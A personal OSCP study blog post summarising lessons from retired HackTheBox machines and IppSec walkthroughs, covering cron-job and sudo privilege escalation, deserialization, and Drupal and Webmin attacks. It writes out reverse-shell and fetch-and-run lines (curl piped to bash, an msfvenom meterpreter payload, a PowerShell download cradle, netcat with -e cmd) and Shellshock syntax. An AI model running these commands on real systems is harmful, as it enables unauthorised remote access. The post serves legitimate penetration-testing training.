OSCP Week 13: HackTheBox (Part 1)

My first week of OSCP study without access to the OSCP lab environment! I decided to take it a little easy and give myself a bit of a break, but still went through a decent number of retired machines on the HackTheBox network. For each machine, I watched the IppSec video in full to gain a complete understanding of the machine and learn as much as I could from his methodology. From there, I went ahead and exploited the machine myself to further cement what I had gained from his video. I had a lot of fun learning some of IppSec’s tricks and general way of thinking and approaching a machine, so I highly recommend his videos to anyone, regardless of skill level. Currently, I’m going through the videos in his “HTB Boxes to Prepare for OSCP” Playlist but he also has an excellent beginner playlist available.

Below are my quick thoughts on the machines I went through, followed by the “key takeaways” that I gained from each.

Bashed

This machine had a pretty interesting privilege escalation that I hadn’t seen before, where a python script was running as a root cron job. I hadn’t experimented much with cron jobs before, so identifying + exploiting one was entirely new to me.

Key Takeaways:

Seeing that www-data could sudo to the user scriptmanager without a password using LinEnum.sh or sudo -l. The command to spawn a new session as this user is:
sudo -u scriptmanager bash -i

Using ls -la to view the privileges of the files in the /scripts/ directory. From here we can see that the scripts are running every minute with root privilege, which indicates a cron job running with root privileges. Scripts in this directory can therefore be edited or replaced with shellcode to spawn a new reverse shell with root privileges.

Celestial

A more difficult machine, Celestial provided an example of a deserialization exploit in NodeJS. I was not very familiar with NodeJS or the serialazation of data, so it was difficult for me to fully grasp the mechanics behind this, but I still found some sections useful.

Key Takeaways:

Using the foxyproxy FireFox extension, proxy settings can be changed to forward web traffic to Burp Suite where cookie information can be obtained and manipulated. Forwarding a request with modified cookie information effectively creates a new session where code could be inserted for execution of a reverse shell. One way code execution can be tested is by using the ping command, which can be detected using tcpdump on the host machine.

Curl can be used to upload a reverse bash shell from your host machine, and piping the output to bash will execute the reverse shell instantly. This can be more useful than wget if you have less permissions or a less interactive shell.
curl x.x.x.x/shell.sh | bash

Another way to enumerate cron jobs running on the victim machine is to access the syslog file, where you can find the cronjob running a script as root. In the same way as Bastard, editing this script with reverse shell code executes with root priviliges.
Syslog can be accessed using cat /var/log/syslog

Devel

I used metasploit for this machine, because I didn’t have a lot of experience using the metasploit privilege escalation suggester and exploit modules. A straightforward box that contained a ftp vulnerability I had seen before, but good experience nonetheless.

Key Takeaways:

Google can be used to find the version of Windows from the IIS version number provided by a basic nmap scan. Further googling about IIS will tell you that it executes .asp or .aspx files. These files can be used to generate a reverse shell, if they can be uploaded to the victim machine. In this case, anonymous ftp access allowed read/write permissions, so the command put devel.aspx was all that was required to upload.

The 3 basic flags required for msfvenom, alongside LPORT and LHOST are:
-p for payload
-f for format
-o output
For this machine, a meterpreter reverse shell can be generated using: msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f aspx -o devel.aspx

A meterpreter session can be useful for enumeration of a machine, where commands such as systeminfo can be used to dump OS, Service Pack and architecture information

Metasploit has a local exploit suggester which can be used provided the windows machine architecture is x86. It is effective at identifying which exploits the machine is vulnerable to, and makes privilege escalation much more trivial.

Legacy

Not much to see here other than an outdated version of Samba! Identical to what I’ve seen before, using metasploit and the notorious ms08-067 exploit module gets you an instant shell with System privileges.

Bastard

A harder machine that contained a lot of different steps to complete, Bastard taught me a lot about both session manipulation and PHP exploitation. I actually struggled a lot getting the PHP code to execute, and when it did I wasn’t able to obtain any stable shells. In the end I had to really persevere and work with what I was able to get to make this machine work.

Key Takeaways:

Droopescan – a scanner for Drupal websites similar to wpscan for WordPress sites.

Using an exploit to obtain cookie and session information, which can be utilized via a CookieManager. This allows for the login page to be bypassed, providing access to the admin console where code execution is possible via the add article module.

IppSec covered some powershell wizardry in his video for this machine, most of which went over my head. I was, however, able to pick up a couple of ways he uploaded files to the machine:

  • Uploading a powershell reverse shell using: fexec=echo IEX(New-Object Net.WebClient).DownloadString(‘http://x.x.x.x:80/PowerUp.ps1’) | powershell -noprofile –
  • Uploading a compiled version of netcat using: fupload=nc64.exe&fexec=nc64.exe -e cmd x.x.x.x 4444

Enumerating the version of Windows and the patches applied. This can be done by browsing to cd\Windows\SoftwareDistribution\Download which shows the patches that have been downloaded (but not necessarily installed). Using the command type WindowsUpdate.log is also useful, to show when and what patches have been installed.

Beep

Another easier machine, Beep has a lot of services to sift through on the initial enumeration attempts, but was straightforward enough once you found the vulnerability. IppSec’s video for this machine proved that there are many ways to obtain a low privilege shell on this machine, but I found the easiest way the most obvious.

Key Takeaways:

SSH bruteforcing may be blocked on some machines if they have rules or processes set to lock users out after a set number of failed authentication attempts. This machine was running fail2ban, which meant that Hydra was useless and the root password needed to be found via other methods. This highlights the need for thorough enumeration to find what sort of systems exist on a machine before you try to exploit! Fail2ban rules can be read by accessing the fail2ban.conf file

IppSec ran through his method of Viewing the source of an LFI vulnerability to check if RFI or RCE was possible. He exaplined that when the php code uses an include statement, RCE could be possible. This was a touch advanced for me, but it was very interesting to see him dissect and reverse engineer an exploit to see if he could leverage it further. Eventually, he was able to use snmp to execute code and receive a reverse shell.

Burp Suite’s proxy function can bypass SSL checks using localhost as a new listener, redirecting traffic to the victim machine host. This requires some configuration but is useful to keep in mind if I ever run into this problem myself. Without doing this, the initial exploit would not run so it was a necessary step in the exploitation process.

Shellshock on webmin – this is something that I need to look into more. I believe there is a machine dedicated to this in the retired machine rotation, but IppSec was able to exploit the webmin service using Shellshock to gain a reverse shell. The basic syntax for Shellshock is: () { :; }; command

That’s all for this weeks post. I apologize that this probably isn’t going to be the most useful for anyone other than myself, but I still want to carry on documenting everything I do up until the OSCP exam next month. Not far to go now!

Kento.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s